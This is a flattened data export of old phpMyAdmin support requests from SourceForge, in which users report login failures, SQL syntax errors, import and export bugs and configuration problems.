Hi, if I have one table with auto increment, when I try to copy that table using Operations and cOPY Table To I got the following error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 21DEFAULT CHARSET = latin1 at line 10 The problem is that the value for Auto Increment don t have a space beetwen the value and the text Default Charset.
ENGINE = MYISAM AUTO INCREMENT = 21DEFAULT CHARSET = latin1 Plese, someone knows how to fix that in the simple way ?
I only need the variable for Auto Increment or the variable or file for DEFAULT CHARSET .
Tks Original URL https sourceforge.net p phpmyadmin support requests 1053 https sourceforge.net p phpmyadmin support requests 1053 Original author dopsmorts Found in version 2.6.2","bug"
"24444","2875","Operations Copy Table Auto Increment.
Hi, if I have one table with auto increment, when I try to copy that table using Operations and cOPY Table To I got the following error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 21DEFAULT CHARSET = latin1 at line 10 The problem is that the value for Auto Increment don t have a space beetwen the value and the text Default Charset.
ENGINE = MYISAM AUTO INCREMENT = 21DEFAULT CHARSET = latin1 Plese, someone knows how to fix that in the simple way ?
I only need the variable for Auto Increment or the variable or file for DEFAULT CHARSET .
Tks Original URL https sourceforge.net p phpmyadmin support requests 1054 https sourceforge.net p phpmyadmin support requests 1054 Original author dopsmorts Found in version 2.6.2","bug"
"24444","2876","Can t login to phpMyAdmin.
I upgraded to PHP5 5.2.10 and Mysql5 5.0.83) via macports 1.71 on OSX 10.5.7) and now when I go to the PMA login screen and put in my credentials it just refreshes the page when I click submit.
I assume there is a PMA setting that needs to be changed to fix the bug but I don t know which one.
Any thoughts?
FYI no PHP errors show up in the PHP log file, and there are no errors in Apache) Original URL https sourceforge.net p phpmyadmin support requests 1104 Original author stuchalk","bug"
"24444","2877","drop database.
Dear Sir, Sorry to disturb you.
I m a newbie trying to build a Joomla site for my community.
I m using MAMP, MySQL 5.0.19, phpMyAdmin 2.7.0 pl2 on my Mac.
Installed joomla, build the website, everything runs well, until I accidentally drop a table from PHPMyAdmin.
Is there any way I can undo this step?
in MAMP there s no MySQL Manager, only SQLiteManager.
I cannot create a databse here?
How to rebuild this database?
I have the backup in SQL format.
Please help.
Thank you very much.
andrew Original URL https sourceforge.net p phpmyadmin support requests 1055 https sourceforge.net p phpmyadmin support requests 1055 Original author pismobook","bug"
"24444","2878","max questions.
1226 User ohiostre stang has exceeded the max questions resource current value 50000) I keep getting the error above when using phpmyAdmin with my MySQL database.
Is there a way I can get that quota increase to like 200,000?
Original URL https sourceforge.net p phpmyadmin support requests 1056 https sourceforge.net p phpmyadmin support requests 1056 Original author ohio232stang","bug"
"24444","2879","Bookmarked SQL query View only doesn t work.
I have some frequently used bookmarked queries saved in phpmyadmin.pma bookmark table.
I am able to successfully submit these queries through corresponding SQL tabs.
However I am not able to use View only functionality.
If I try to only view bookmarked queries I get new page showing message Showing bookmark on yellow background but bookmarked query is not shown!
I have found this bug both in versions 2.11.0 and 2.11.1.
Haven t tested any other versions.
I am running phpmyadmin on Debian Etch php 5.2.0, mysql 5.0.32, apache2 2.2.3).
Original URL https sourceforge.net p phpmyadmin support requests 1057 https sourceforge.net p phpmyadmin support requests 1057 Original author kuulasma","bug"
"24444","2880","Wrong row count with Views.
Hi, I have created a Views table, with a PHP script mysql query CREATE OR REPLACE VIEW view getall..
The result is a View with 77 rows.
PhpMyAdmin version 2.11.1 show the column count wrong Showing rows 0 1 0 total, Query took 0.0128 sec) I have tested it with my old PhpMyAdmin version PhpMyAdmin version 2.9.2 show the column count correct Showing rows 0 29 77 total, Query took 0.0057 sec) Also the MySQL Query Browser has no problem with this views and shows all rows correct.
regards Original URL https sourceforge.net p phpmyadmin support requests 1058 https sourceforge.net p phpmyadmin support requests 1058 Original author hawk master","bug"
"24444","2881","PHP Fatal error.
Have just installed phpmyadmin and get the following errors when trying to browse to it, PHP Warning require once .
libraries common.inc.php) [ lt;a href= function.require once gt;function.require once lt; a gt;] failed to open stream No such file or directory in D \webspace\mysql.XXXX.com.au\www\index.php on line 35 PHP Fatal error require once ) [ lt;a href= function.require gt;function.require lt; a gt;] Failed opening required .
libraries common.inc.php include path= . )
in D \webspace\mysql.XXXX.com.au\www\index.php on line 35 Has anyone else had this problem and know how to fix it?
Original URL https sourceforge.net p phpmyadmin support requests 1108 Original author scoobafish Found in version Latest Git","bug"
"24444","2882","ob flush ) error.
Hi!
I just upgraded my PMA 2.10.1 to 2.11.1 and get the following error at the bottom of the left and main frame Notice ob flush ) failed to flush buffer.
No buffer to flush.
in c \program files\programs\easyphp1 8\phpmyadmin\libraries\ob.lib.php on line 101 I know, it s just a notice, but why could this be?
Is it my Apache or PHP or has somebody else seen this error too?
Thanks guys, keep up the great work!
Original URL https sourceforge.net p phpmyadmin support requests 1059 https sourceforge.net p phpmyadmin support requests 1059 Original author drunkenm","bug"
"24444","2883","With LeftFrameLight, select box doesn t display on home page.
Since 2.11 came out, I ve had this problem.
I ve searched the bug reports, but I haven t found anyone else report it.
It still exists in 2.11.1.2, so I m filing a report.
This is with LeftFrameLight enabled which is default).
When first logging in, or, when clicking the Home link, the select box for the databases isn t there, instead there is just a basic unsorted list lt;ul gt;).
But as soon as I select a database, then I get a proper lt;select gt; list with all of the databases.
This is with multiple database servers.
Besides cfg[ Servers ], the only settings I have defined are cfg[ LeftDisplayLogo ] = FALSE; cfg[ LeftDisplayServers ] = TRUE; cfg[ ShowChgPassword ] = TRUE; cfg[ QueryHistoryDB ] = TRUE; cfg[ LoginCookieValidity ] = 604800; It works fine in 2.10.3.
The server select box looks fine.
The HTML code when it s not working looks like this lt;ul id= databaseList xml lang= en dir= ltr gt; lt;li gt; lt;a href= index.php?db=adviseSched amp;amp;token=116d36bcd54779acaff0c8366b647521 target= parent gt;adviseSched 15) lt; a gt; lt; li gt; lt;li gt; lt;a href= index.php?db=calendar amp;amp;token=116d36bcd54779acaff0c8366b647521 target= parent gt;calendar 24) lt; a gt; lt; li gt; lt;li gt; lt;a href= index.php?db=cbee resources amp;amp;token=116d36bcd54779acaff0c8366b647521 target= parent gt;cbee resources 4) lt; a gt; lt; li gt; lt;li gt; lt;a href= index.php?db=cce gradref amp;amp;token=116d36bcd54779acaff0c8366b647521 target= parent gt;cce gradref 5) lt; a gt; lt; li gt; lt;li gt; lt;a href= index.php?db=ce resources amp;amp;token=116d36bcd54779acaff0c8366b647521 target= parent gt;ce resources 4) lt; a gt; lt; li gt; lt;li gt; lt;a href= index.php?db=che resources amp;amp;token=116d36bcd54779acaff0c8366b647521 target= parent gt;che resources 8) lt; a gt; lt; li gt; ... lt; ul gt; After selecting a database, the HTML code looks like this lt;select name= db id= lightm db xml lang= en dir= ltr onchange= if this.value != ) window.parent.openDb this.value); gt; lt;option value= dir= ltr gt; Databases) ... lt; option gt; lt;option value= adviseSched title= gt;adviseSched 15) lt; option gt; lt;option value= calendar title= selected= selected gt;calendar 24) lt; option gt; lt;option value= cbee resources title= gt;cbee resources 4) lt; option gt; lt;option value= cce gradref title= gt;cce gradref 5) lt; option gt; lt;option value= ce resources title= gt;ce resources 4) lt; option gt; lt;option value= che resources title= gt;che resources 8) lt; option gt; ... lt; select gt; Original URL https sourceforge.net p phpmyadmin support requests 1060 https sourceforge.net p phpmyadmin support requests 1060 Original author clevelas","bug"
"24444","2884","Improper Unicode handling of large files.
I have a database with a table that has a key field.
In one record, the key is pinata, and in another record, the key is pixc3x83xc2xb1ata.
xc3x83xc2xb1 is apparently unicode for xc3xb1.
When I export the table using phpMyAdmin, it correctly shows one insert using pinata and the other using pixc3x83xc2xb1ata.
However, if I use phpMyAdmin to import the table into a different database, I get a key collision, and the error is because pixc3xb1ata collides with pinata.
Note well pixc3xb1ata.
Somehow, phpMyAdmin is converting xc3x83xc2xb1 to xc3xb1 before it actually issues the query against my database.
If I enter the commands manually using the MySql command line interface, it works fine mysql gt; CREATE TABLE `x` gt; `word` varchar 50) NOT NULL default , gt; `count` float default NULL, gt; PRIMARY KEY `word`) gt; ) TYPE=MyISAM; Query OK, 0 rows affected, 1 warning 0.09 sec) mysql gt; INSERT INTO `x` VALUES pinata , 0.30103); Query OK, 1 row affected 0.00 sec) mysql gt; INSERT INTO `x` VALUES pixc3x83xc2xb1ata , 0.177487); Query OK, 1 row affected 0.00 sec) If you run these exact queries in phpMyAdmin, you get the error that indicates a key collision.
Original URL https sourceforge.net p phpmyadmin support requests 1061 https sourceforge.net p phpmyadmin support requests 1061 Original author acambre","bug"
"24444","2885","More specific upgrading instructions desired.
The text at http localhost phpmyadmin Documentation.html upgrading currently says Simply copy .
config.inc.php from your previous installation into the newly unpacked one....
I am really not quite sure what to do.
I don t wish to create a new installation but to upgrade my current installation.
I think what these instructions say is to First, Unzip Unpack the installation file into a temporary location, e.g., C \PHP\).
Second, Replace the .
config.inc.php file in the unpacked directory e.g., C \PHP\) with your current .
config.inc.php file.
Third, Copy all of the files in the temporary location, e.g., C \PHP\) into your current php directory e.g.
C \phpMyAdmin\) Is this accurate and complete?
Original URL https sourceforge.net p phpmyadmin support requests 1063 https sourceforge.net p phpmyadmin support requests 1063 Original author svanslyck","bug"
"24444","2886","Can t login after failed login.
Reproduction Steps 1\.
Log in to phpMyAdmin successfully 2\.
Log out 3\.
Try to log in with an incorrect password or none) 4\.
Try again with a valid user and password The last login will fail, as will all subsequent attempts.
The error is 1045 Access denied for user XXX XXX Using password ...
If you try it with no password in step three, the error message will always say Using password NO , even if you enter one in subsequent attempts.
Deleting the phpMyAdmin cookie in the browser corrects the problem, as does closing and reopening the browser.
If you omit steps 1 and 2, it will work OK.
This did not happen in 2.9.2.
Versions phpMyAdmin 2.11.2.1 and 2.11.3 PHP 4.4.7 MySQL 3.23.47 Browser Firefox 2.0.0.11 Authentification Method cookie Original URL https sourceforge.net p phpmyadmin support requests 1065 https sourceforge.net p phpmyadmin support requests 1065 Original author tedrichards","bug"
"24444","2887","I get critical errors in tbl replace.php.
When trying to update exiting row data, i get following critical errors occuring in the tbl replace.php file.
I have attached a saved html file of the problem.
Original URL https sourceforge.net p phpmyadmin support requests 1066 https sourceforge.net p phpmyadmin support requests 1066 Original author emuen","bug"
"24444","2888","can t log in if session handler is memcache ?.
Hello, I upgrade from 2.7.0 pl2 to 2.11.3 and now I m unable to connect to phpmyadmin via cookie auth type).
After searching, I found part of my in libraries auth cookie.auth.lib.php checks on SESSION[ last access time ] always fail, since SESSION[ last access time ] is not set.
I don t obtain any error, just stay on the auth form .
I supposed it is due to the memcache session handler which is used on our setup, but replacing the session.inc.php of the 2.7.0 version doesn t correct the problem.
Original URL https sourceforge.net p phpmyadmin support requests 1067 https sourceforge.net p phpmyadmin support requests 1067 Original author kioob","bug"
"24444","2889","login authentication !!!.
pls let me know how to give login authentication to php my admin.
i can give it in myadmin console but i cant log back in using the password which i gave.
pls advice.
Original URL https sourceforge.net p phpmyadmin support requests 1068 https sourceforge.net p phpmyadmin support requests 1068 Original author hameed131 Found in version 2.5.5 pl1","bug"
"24444","2890","failed to open stream.
We just recently moved our server over to a virtual instance, and I can t seem to get phpMyAdmin up and running again.
I ve searched for a while now, and haven t ran across anything that has helped.
For some reason, I m getting this error, even though the files are there Warning main .
libraries common.inc.php) failed to open stream No such file or directory in E \LIBAPPLS\phpMyAdmin2\index.php on line 34 Fatal error main ) Failed opening required .
libraries common.inc.php include path= .
;c \php4\pear ) in E \LIBAPPLS\phpMyAdmin2\index.php on line 34 If it helps any, this is running on Windows Server 2000, trying to run phpMyAdmin version 2.11.10.
I appreciate your time and help!
Original URL https sourceforge.net p phpmyadmin support requests 1122 Original author captainddl","bug"
"24444","2891","phpmyadmin.
i accidently deleted my phomyadmin directory and now i can t log into phpmyadmin i get an an error code 1045 access denied stryderblaze localhost password yes Original URL https sourceforge.net p phpmyadmin support requests 1069 https sourceforge.net p phpmyadmin support requests 1069 Original author crimsonblaze","bug"
"24444","2892","csv export defaults to quot;.
When using the csv export, amp;quot; is used as default quotation sign.
This is obviously bogus,as this is an html entity, which has nothing to do with csv.
Seems you ve escaped one time too much at some place.
Original URL https sourceforge.net p phpmyadmin support requests 1071 https sourceforge.net p phpmyadmin support requests 1071 Original author ctulhu","bug"
"24444","2893","valid SQL query create triger with begin\end was failed.
The query DROP TRIGGER rar task del; CREATE TRIGGER rar task del BEFORE DELETE ON RarTasks FOR EACH ROW REPLACE INTO logRarTasks SELECT FROM RarTasks WHERE OLD.task id=task id; was completed sucessed.
But the same query with keywords begin \ end was failed!
DROP TRIGGER rar task del; CREATE TRIGGER rar task del BEFORE DELETE ON RarTasks FOR EACH ROW BEGIN REPLACE INTO logRarTasks SELECT FROM RarTasks WHERE OLD.task id=task id; END; 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near REPLACE INTO logRarTasks SELECT FROM RarTasks WHERE OLD.task id=task id at line 2 But in console this query is ok. phpMyAdmin 2.11.4 MySql 5.0.27 Original URL https sourceforge.net p phpmyadmin support requests 1072 https sourceforge.net p phpmyadmin support requests 1072 Original author stanislav rus","bug"
"24444","2894","import.php Missing parameter.
When I go to the SQL tab, submit the default query SELECT FROM `tablename` WHERE 1 and click on Refresh several times, I sometimes get the error message import.php Missing parameter import type FAQ 2.8) import.php Missing parameter format FAQ 2.8) Apparently, the missing parameters are not part of the query string, even if the error does not occur.
Some of the FAQ hints do not apply, the others did not help.
Now, the error only occurs in certain cases.
My setup is the following phpMyAdmin runs behind a load balancer on a cluster of two servers pma1 and pma2 that both serve requests for a shared virtual host name pma .
If the very first request is served by pma1, the error will occur with all requests that are routed to pma2 and vice versa).
So I guess this is kind of a session issue.
But I have no clue as to how to resolve it.
The problem does not occur with phpMyAdmin 2.6.4.
Original URL https sourceforge.net p phpmyadmin support requests 1073 https sourceforge.net p phpmyadmin support requests 1073 Original author ljaeger","bug"
"24444","2895","Column aliases at SELECT result export fail to appear.
Hello.
There is a very nice button Export while PMA is displaying some result of SELECT query.
If you use SELECT foo AS bar FROM table; and then click on the Export link, you re able to export the result, but the foo column alias bar is ignored.
Unpleasant, though not a major problem Original URL https sourceforge.net p phpmyadmin support requests 1074 https sourceforge.net p phpmyadmin support requests 1074 Original author pogik Found in version Latest Git","bug"
"24444","2896","Cannot load mysql extension.
Please check your PHP configur.
running php from php 5.2.12 nts win32 installer.msi on win7, iis downloaded phpMyAdmin 3.2.5 all languages but when i test using http localhost phpMyAdmin, i get the above error.
my php.ini states extension=php msql.dll extension dir = C \Program Files\PHP\ext yet there is only the following files in the ext dir php dbase.dll php exif.dll php fdf.dll php gd2.dll php mbstring.dll Have read the other posts but nothing helps.
Appreciate any assistance.
david Original URL https sourceforge.net p phpmyadmin support requests 1128 Original author gingernob","bug"
"24444","2897","Root password problems Newbie.
I am a long time Mac user but am fairly new to mySQL and php.
I m comfortable with phpMyAdmin and mySQL Workbench.
I m using OS X 10.6.2 with MAMP Version 1.8.4.
I used phpMyAdmin to change the root password.
Then I used Directory Utility to change the root password in the OS to match.
After restarting I get the following error when I launch MAMP or phpMyAdmin.
My goal was to make my setup more secure by changing the default root password.
If both passwords are the same, what am I missing.
TIA tom Original URL https sourceforge.net p phpmyadmin support requests 1131 Original author tdrolett","bug"
"24444","2898","APC and PMA.
I understand that PMA stops working when APC is enabled in PHP.
Is there any reason why this is?
Any ideas of if it s going to be fixed?
Or if there s a work around?
Original URL https sourceforge.net p phpmyadmin support requests 1075 https sourceforge.net p phpmyadmin support requests 1075 Original author ahmednuaman","bug"
"24444","2899","InnoDB Disabled??!?.
I am creating foreign keys within my database.
However, when I checked what storage engines I had, InnoDB was put as disabled .
How can i go about enabling this?
It is needed for my foreign keys to work.
Regards, Colette Original URL https sourceforge.net p phpmyadmin support requests 1076 https sourceforge.net p phpmyadmin support requests 1076 Original author col10","bug"
"24444","2900","Can t add auto increment field.
In the past I have successfully added auto increment fields to tables using the MYSQL command line interface but now I am trying to do that on a system where I don t have shell access and only have PHPMYADMIN as an interface.
It fails every time.
I fill out the fields to add a column id smallint unsigned auto increment primary key first but it always fails with this error message Error SQL query ALTER TABLE `profiles4` ADD `id` SMALLINT 5 ) NOT NULL AUTO INCREMENT FIRST MySQL said 1075 Incorrect table definition; there can be only one auto column and it must be defined as a key Well, there is only one auto column, the one being added, and it is being defined as the primary key EXCEPT THAT PHPMYADMIN SEEMS TO BE FORGETTING TO ADD THE PRIMARY KEY to the ALTER TABLE statement.
I chose the primary key radio button but apparently it is ignored.
I tried writing the correct ALTER TABLE code in the SQL code editor but that is also rejected.
I am using Mysql 5.
What is the problem?
Thanks.
Richard Original URL https sourceforge.net p phpmyadmin support requests 1077 https sourceforge.net p phpmyadmin support requests 1077 Original author rmatzinger","bug"
"24444","2901","Can t open index.php without errors.
I just installed phpMyAdmin.
But when I yrt to open http localhost phpMyAdmin index.php I always get the following error phpMyAdmin Error Cannot start session without errors, please check errors given in your PHP and or webserver log file and configure your PHP installation properly.
Can anyone help me?
Thanks, Leif Baker Original URL https sourceforge.net p phpmyadmin support requests 1078 https sourceforge.net p phpmyadmin support requests 1078 Original author leifbaker","bug"
"24444","2902","Page hangs mid way through since 2.11 fastcgi).
Every release in the 2.11 series has a problem for me.
Login is fine; f I try to go further, either into an existing table or to take any other action e.g., Operations ) everything seems to load about half way and then hangs.
On the webserver php fastcgi), processes are left hanging.
A strace of one had the last thing as waitpid 1) .
I ve rolled back to 2.10.2 which works fine.
Everything I ve tried from 2.11 has this bug most recent 2.11.4.
Original URL https sourceforge.net p phpmyadmin support requests 1079 https sourceforge.net p phpmyadmin support requests 1079 Original author davidanderson68","bug"
"24444","2903","Database form dropdown menu is broken.
For the love of god will someone please fix the database drop down menus, they have been broken since several releases.
Why hasn t it been fixed ?
The initial database list should be in a drop down menu form but it only shows up as bullets.
I know its silly but it should be fixed Original URL https sourceforge.net p phpmyadmin support requests 1080 https sourceforge.net p phpmyadmin support requests 1080 Original author bugreports","bug"
"24444","2904","1045 Access denied for user root localhost using pas.
I am running MySql Server 5.1, PHP 5.0 and PHPmyAdmin 2.11.5 When I connect to MySql via Commands line client everything is ok.
But in PHPmyAdmin and frem CMS I get this message 1045 Access denied for user root localhost using password NO) Please help me, I can not find any answer in the forum, even not in a string with exactly this description.
tage wanthai vip.cybercity.dk Original URL https sourceforge.net p phpmyadmin support requests 1081 https sourceforge.net p phpmyadmin support requests 1081 Original author wanthai Found in version Latest Git","bug"
"24444","2905","won t install right; found way around it, but couldn t login.
I ve been trying to install phpmyadmin.
I ve installed quite a few times with no luck.
At first I installed it to phpmyadmin.
When I entered the URL in my browser, it showed just a blue bar at the top of the page, and iamphotography.net in it.
Eventually, while searching through the files in phpmyadmin, I found a way to get to the Login page.
So, happy that I found a way in, I entered my username and password, hit enter, and another error!
Here is the error message I keep getting 1045 Access denied for user Jalisa localhost using password YES) I installed one last time.
Now it goes to phpmyadmin and it shows the login page sometimes.
But I can t login!
Other times, it shows that blue bar again.
I was able to get in a few other times, but after that, I haven t been able to get in since.
I ve changed my password.
Installed and installed and installed again.
I dont know what to do!!
I m new to this, so please, any help in simple terms would be much much appreciated.
I m hosted by Yahoo, if that helps any.
Original URL https sourceforge.net p phpmyadmin support requests 1082 https sourceforge.net p phpmyadmin support requests 1082 Original author jalisaaa","bug"
"24444","2906","Sign on impossible on remote server with version 2.11.6 rc1.
I m having this problem trying to access the MySql server using the latest version 2.11.6 rc1).
I get this message back when trying the option config as the auth type method in PMA; Wrong username password.
Access denied.
This error does not appear when we use PMA version 2.11.5 and the very same PMA configuration.
By the way this problem is showing up when trying to access the server remotely.
When we run this very same PMA configuration locally it runs well.
My ISP is running System Linux esc82.midphase.com 2.6.9 55.ELsmp 1 SMP Wed May 2 14 28 44 EDT 2007 i686 SERVER SOFTWARE Apache 1.3.39 Unix) mod fastcgi 2.4.2 mod auth passthrough 1.8 mod log bytes 1.2 mod bwlimited 1.4 FrontPage 5.0.2.2635.SR1.2 mod ssl 2.8.30 OpenSSL 0.9.7a PHP CGI 0.1b PHP Version 5.2.4 Mysql Server version 4.1.22 standard MySQL client version 4.1.22 Used PHP extensions mysql Server Localhost via UNIX socket) version compile os pc linux gnu This is the config.inc.php file I m using, user and password have been changed).
if !isset old error reporting)) \{ error reporting E ALL); ini set display errors , 1 ); \} cfg[ PmaAbsoluteUri ] = ; cfg[ PmaAbsoluteUri ] = !empty SERVER[ HTTPS ] ) ?
https http ) .
.
SERVER[ HTTP HOST ] .
!empty SERVER[ SERVER PORT ] ) ?
.
SERVER[ SERVER PORT ] ) .
substr SERVER[ PHP SELF ], 0, strrpos SERVER[ PHP SELF ], ) 1 ); Disable the default warning about cfg[ PmaAbsoluteUri ] not being set You should use this if and ONLY if the PmaAbsoluteUri auto detection works perfectly.
cfg[ PmaAbsoluteUri DisableWarning ] = FALSE; Disable the default warning that is displayed on the DB Details Structure page if any of the required Tables for the relationfeatures could not be found cfg[ PmaNoRelation DisableWarning ] = FALSE; The cookie auth type uses blowfish algorithm to encrypt the password.
If at least one server configuration uses cookie auth type, enter here a passphrase that will be used by blowfish.
cfg[ blowfish secret ] = Anything is valid ; Server s) configuration i = 0; The cfg[ Servers ] array starts with cfg[ Servers ][1].
Do not use cfg[ Servers ][0].
You can disable a server config entry by setting host to .
i ; cfg[ Servers ][ i][ host ] = localhost ; MySQL hostname or IP address cfg[ Servers ][ i][ port ] = ; MySQL port leave blank for default port cfg[ Servers ][ i][ socket ] = ; Path to the socket leave blank for default socket cfg[ Servers ][ i][ connect type ] = tcp ; How to connect to MySQL server tcp or socket ) cfg[ Servers ][ i][ extension ] = mysql ; The php MySQL extension to use mysql or mysqli ) cfg[ Servers ][ i][ compress ] = FALSE; Use compressed protocol for the MySQL connection requires PHP gt;= 4.3.0) cfg[ Servers ][ i][ controluser ] = ; MySQL control user settings this user must have read only cfg[ Servers ][ i][ controlpass ] = ; access to the mysql user and mysql db tables).
The controluser is also used for all relational features pmadb) cfg[ Servers ][ i][ controluser ] = ; cfg[ Servers ][ i][ controlpass ] = ; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = HereGoesTheUser ; cfg[ Servers ][ i][ password ] = HoreGoesThePassword ; cfg[ Servers ][ i][ only db ] = ; If set to a db name, only this db is displayed in left frame It may also be an array of db names, where sorting order is relevant.
cfg[ Servers ][ i][ verbose ] = www.videohipico.com ; Verbose name for this host leave blank to show the hostname cfg[ Servers ][ i][ pmadb ] = ; Database used for Relation, Bookmark and PDF Features see scripts create tables.sql) leave blank for no support DEFAULT phpmyadmin cfg[ Servers ][ i][ bookmarktable ] = ; Bookmark table leave blank for no bookmark support DEFAULT pma bookmark cfg[ Servers ][ i][ relation ] = ; table to describe the relation between links see doc) leave blank for no relation links support DEFAULT pma relation cfg[ Servers ][ i][ table info ] = ; table to describe the display fields leave blank for no display fields support DEFAULT pma table info cfg[ Servers ][ i][ table coords ] = ; table to describe the tables position for the PDF schema leave blank for no PDF schema support DEFAULT pma table coords cfg[ Servers ][ i][ pdf pages ] = ; table to describe pages of relationpdf leave blank if you don t want to use this DEFAULT pma pdf pages cfg[ Servers ][ i][ column info ] = ; table to store column information leave blank for no column comments mime types DEFAULT pma column info cfg[ Servers ][ i][ history ] = ; table to store SQL history leave blank for no SQL query history DEFAULT pma history cfg[ Servers ][ i][ designer coords ] = ; table to store XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX DEFAULT pma designer coords cfg[ Servers ][ i][ verbose check ] = TRUE; set to FALSE if you know that your pma tables are up to date.
This prevents compatibility checks and thereby increases performance.
cfg[ Servers ][ i][ AllowDeny ][ order ] Host authentication order, leave blank to not use = ; cfg[ Servers ][ i][ AllowDeny ][ rules ] Host authentication rules, leave blank for defaults = array ); If you have more than one server configured, you can set cfg[ ServerDefault ] to any one of them to autoconnect to that server when phpMyAdmin is started, or set it to 0 to be given a list of servers without logging in If you have only one server configured, cfg[ ServerDefault ] MUST be set to that server.
cfg[ ServerDefault ] = 1; Default server 0 = no default server) cfg[ Server ] = ; unset cfg[ Servers ][0]); Original URL https sourceforge.net p phpmyadmin support requests 1083 https sourceforge.net p phpmyadmin support requests 1083 Original author yacar suscri","bug"
"24444","2907","Version 2.10.0 is not on sourceforge.net.
I am unable to find phpMyAdmin Version 2.10.0 on sourceforge.net Unfortunately only the interface for 2.10.0 is on sourceforge and all older versions other than the current are no longer there.
I have an emergent need for Version 2.10.0 and would much appreciate someone sending it to me.
Thanks, RANDAL lt;randalsouth att.net gt; Original URL https sourceforge.net p phpmyadmin support requests 1084 https sourceforge.net p phpmyadmin support requests 1084 Original author zcorker Found in version Latest Git","bug"
"24444","2908","New install, No Welcome Screen.
Sorry for the trouble, I have searched but not found any solution.
The last few days I installed phpMyAdmin and it works fine.
Today I just see a display of the index.php screen see below).
So I wiped the whole install and reinstalled extracted the zip, copied to my webserver and renamed the folder to phpMyAdmin) and went to lt;ipaddress gt; phpMyAdmin.
But, I still just see the index.php contents in my browser, no welcome screen, no install screen.
Could anyone be so kind to explain any stupid mistake I am making?
phpMyAdmin phpMyAdmin 3.3.4 english.zip Server Synology DS107j with web server and MySQL database enabled.
Browser Firefox 3.6.6 Just see... lt;?php vim set expandtab sw=4 ts=4 sts=4 forms frameset version Id uses GLOBALS[ strNoFrames ] uses GLOBALS[ cfg ][ QueryHistoryDB ] uses GLOBALS[ cfg ][ Server ][ user ] ...
Original URL https sourceforge.net p phpmyadmin support requests 1144 Original author anonymous","bug"
"24444","2909","Trying to clone uncloneable object.
This is the message [Fri May 2 21 11 31 2008] [error] PHP Fatal error Trying to clone an uncloneable object of class mysqli in usr local www phpMyAdmin libraries dbi mysqli.dbi.lib.php on line 86 My PHP PHP 5.2.5 with Suhosin Patch 0.9.6.2 cli) built Feb 29 2008 17 48 58) Copyright c) 1997 2007 The PHP Group Zend Engine v2.2.0, Copyright c) 1998 2007 Zend Technologies My MySQL mysql Ver 14.7 Distrib 4.1.22, for portbld freebsd6.3 i386) using 5.2 Happens randomly when I click around in phpmyadmin.
Currently experiencing it on a database which contains a default install of ezPublish 4.0).
Original URL https sourceforge.net p phpmyadmin support requests 1085 https sourceforge.net p phpmyadmin support requests 1085 Original author klimpong","bug"
"24444","2910","SQL Windows dont work !.
sorry for the question... but with the 2.11.x version, whenever i do a query inside the sql window i get the error import.php Missing parameter import type FAQ 2.8) import.php Missing parameter format FAQ 2.8) I have installed xp sp3 sp2 was the same...) apache 2.0.63 openSSL 0.9.7m) php 5.2.6 5.2.5 was the same...) I ve tried every thing suggested in FAQ 2.8...
IT DOESN T WORK !!!
I have to use old version 2.9.2 and all it s OK...
I can t find how, PLEASE help me... Francesco.
Original URL https sourceforge.net p phpmyadmin support requests 1086 https sourceforge.net p phpmyadmin support requests 1086 Original author fragoto","bug"
"24444","2911","Link Insert data from a text file .
Hi, I hope I m in the good place.
I ve PhpMyAdmin 3.2.4 and I don t find the link above.
I read on different forums it must be at the bottom of the table s page.
But I haven t. How can I do to insert data from only one field in a csv file ?
Thanks for your help Original URL https sourceforge.net p phpmyadmin support requests 1147 Original author anonymous","bug"
"24444","2912","will not update row in wordpress.wp options table.
When attempting to update a row in the wordpress wp options table you receive the following SQL query Edit INSERT INTO ) VALUES ), ) MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ) VALUES ), ) at line 1 Removing two columns from the table results in the ability to update.
I tested removing 5 different columns one at a time and only removing two any combinations) worked.
This version is packaged with Plesk so this very well could be addressed in your later versions but I told my customer I d check and open a report.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 1087 https sourceforge.net p phpmyadmin support requests 1087 Original author vinsonr","bug"
"24444","2913","SELECT DISTINCT CAST AS CHAR still truncates results.
Hello, regarding to bug track 1815699, there is still the same problem results are truncated to length of 3 chars when calling some SQL like SELECT DISTINCT CAST jahr as char) FROM cds table cds from sample database cdcol) System configuration phpmyadmin 2.11.4 on MS Windows 2003 Server oder MS Windows XP SP3) MySQL 5.0.51a on MS Windows 2003 Server) We just installed xampp 1.6.6a from xampp win32 1.6.6a installer.exe on a new clean) MS Windows 2003 Server Enterprise Edition Machine and still the same problem occured as described in bug track 1815699.
The problem also still occurs when using Mysql connector .NET current Version 5.2.2).
Important in this case is using DISTINCT and CAST ... AS CHAR) together.
Thanks for help.
Daniel Original URL https sourceforge.net p phpmyadmin support requests 1088 https sourceforge.net p phpmyadmin support requests 1088 Original author dgpunkt","bug"
"24444","2915","Login Default !Config File setup default.
Is there a PHPMyAdmin version with login username password on the default install?
Setting up a config script has been a User Computer interface issue for me every time, usually the first of four problems I have Original URL https sourceforge.net p phpmyadmin support requests 1091 https sourceforge.net p phpmyadmin support requests 1091 Original author existrix","bug"
"24444","2916","Access denied for root localhost .
Version no 2.11.6 When I try to enter in to phpmyadmin its giving this error.
Error 1045 Access denied for root localhost Password no password) I have more than 20 projects running.
All are crashed due to database error.
I am using WAMP server.
I am using it for 6 months.
It was fine.
But in a minute suddenly it took place Wats the problem.
Its urgent.
Please.
Regards, E.Karnika Yashwant, eyashwant gmail.com.
Original URL https sourceforge.net p phpmyadmin support requests 1092 https sourceforge.net p phpmyadmin support requests 1092 Original author eyashwant Found in version Latest Git","bug"
"24444","2917","Can t setup.php 3.00 rc1.
I load up https myhost phpmyadmin scripts setup.php in my browser and none of the buttons do anything except create the config.inc.php file.
After the file is created nothing else has any apparent effect, and doesn t change the mod time on config.inc.php.
If I remove config.inc.php, pushing a button re creates it.
https myhost phpmyadmin comes up as expected, but of course complains that it can t access the database and offers a link to the setup script.
All files are owner group as apache apache .
chmod 777 doesn t help.
